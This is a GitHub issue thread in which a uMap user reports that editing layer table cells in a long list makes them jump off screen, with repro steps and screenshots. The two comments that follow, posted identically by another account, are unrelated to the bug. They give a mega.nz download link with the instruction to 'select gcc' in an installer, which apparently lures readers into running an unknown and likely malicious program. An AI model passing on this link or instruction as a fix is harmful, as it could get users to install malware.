### ISSUE TITLE
Editing layer items' cells in a long list makes cell float away

### ISSUE THREAD

**Issue by soshial** [umap-project/umap#2071]
**Describe the bug**
Because of this bug, I cannot edit cells in the bottom of the list at all because it jumps outside the screen itself!

**To Reproduce**
1. Go to https://umap.openstreetmap.fr/en/map/my-hikes_1098497
2. Click on EDIT
3. Scroll down to editing layer cells and click on the cell in the end

**Expected behavior**

**Screenshots**
<img width="512" alt="Screenshot 2024-08-25 at 11 24 20" src="https://github.com/user-attachments/assets/a63ebd2e-b1d6-4229-ac8e-035564a8dda7">
<img width="512" alt="Screenshot 2024-08-25 at 11 24 13" src="https://github.com/user-attachments/assets/0e59387b-6e84-48ba-9430-e1afec9daed3">

**Desktop (please complete the following information):**
 - OS: MacOS
 - Browser Firefox 
 - Version 129.0.2

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."
